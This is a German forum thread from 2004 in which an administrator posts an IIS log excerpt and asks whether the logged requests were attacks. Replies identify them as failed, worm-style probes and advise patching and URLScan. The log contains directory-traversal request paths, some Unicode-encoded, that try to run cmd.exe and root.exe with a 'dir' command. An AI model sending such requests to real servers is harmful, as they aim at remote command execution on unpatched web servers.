Crockett 10 Geschrieben 26. Juli 2004 Melden Geschrieben 26. Juli 2004 Hallo ! Hiermal ein Auszug aus dem Log von meiner IIS. ------ 2004-07-26 07:08:11 192.168.0.5 GET /scripts/root.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /MSADC/root.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /c/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /d/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/..../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/..../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:15 192.168.0.5 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:15 192.168.0.5 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 ---------- Am Ende steht immer der Code 404, heißt das das diese Versuche gescheitert sind oder sollte ich mir sorgen machen ? Gruß Christian
din 10 Geschrieben 26. Juli 2004 Melden Geschrieben 26. Juli 2004 jepp das ist ein Attack versuch, da versucht jemand sogenannte Unicodes erfolgreich zu testen ums so einen zugriff auf das system zu erhalten. Könnte ein überbleibsel des Code Reds sein der simmer noch irgendwo im Netz umher irrt. Also einfach Windows aktuell halten dann sollte dies keine Bedrohung mehr darstellen. MFG dIN
Crockett 10 Geschrieben 27. Juli 2004 Autor Melden Geschrieben 27. Juli 2004 @din Danke für die Antwort... Sind die Versuche denn fehlgeschlagen weil hinten der Code 404 im Log steht ? Kann man evtl so etwas lokal testen ob der Server auf sowas reagiert ? Gruß Christian
Lian 2.659 Geschrieben 27. Juli 2004 Melden Geschrieben 27. Juli 2004 Jep, beim Ergebnis 404 (File not Found) sind die Attacken erfolglos. Trotzdem mal über das IIS Lockdown Tool nachdenken - URLscan ist Dein Freund: http://www.microsoft.com/technet/security/tools/locktool.mspx
Crockett 10 Geschrieben 28. Juli 2004 Autor Melden Geschrieben 28. Juli 2004 @Lian Danke für den Link.. Hatte darüber mal was gelesen und auch schon mal runtergeladen. Ließ sich bei mir aber nicht installieren. Setze einen SBS 2003 ein wo der IIS 6.0 drauf läuft. Kann es sein das das Tool nur für die älteren Versionen vom Windows Servern und IIS ist ? Gruß Christian
Lian 2.659 Geschrieben 28. Juli 2004 Melden Geschrieben 28. Juli 2004 Richtig, bei 2003 ist das Lockdown Tool schon eingebaut.
Crockett 10 Geschrieben 29. Juli 2004 Autor Melden Geschrieben 29. Juli 2004 @Lian Habe beim 2003 Server nichts gefunden ? Kann man das konfigurieren oder ist das einfach Build In ? Gruß Christian
Empfohlene Beiträge
Erstelle ein Benutzerkonto oder melde dich an, um zu kommentieren
Du musst ein Benutzerkonto haben, um einen Kommentar verfassen zu können
Benutzerkonto erstellen
Neues Benutzerkonto für unsere Community erstellen. Es ist einfach!
Neues Benutzerkonto erstellenAnmelden
Du hast bereits ein Benutzerkonto? Melde dich hier an.
Jetzt anmelden